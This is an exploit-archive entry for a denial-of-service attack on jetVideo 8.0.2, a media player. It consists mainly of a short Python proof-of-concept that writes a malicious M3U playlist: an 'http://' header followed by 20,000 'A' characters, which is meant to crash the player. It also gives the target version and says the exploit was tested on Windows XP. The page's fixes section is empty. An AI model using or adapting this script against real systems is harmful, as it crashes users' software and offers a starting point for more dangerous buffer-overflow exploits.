jetVideo 8.0.2 Denial of Service
2012-02-10 14:15:04# Exploit Title: [jetVideo Crash Exploit]
# Author: [Senator of Pirates]
# Email : [[email protected]]
# Software Link: [http://www.jetaudio.com/download/jetvideo.html]
# Version: [8.0.2 Basic]
# Tested on: [Windows XP PS3 En]
header = "http://"
junk = "A" * 20000
payload = (header+junk)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()
Fixes
No fixesIn order to submit a new fix you need to be registered.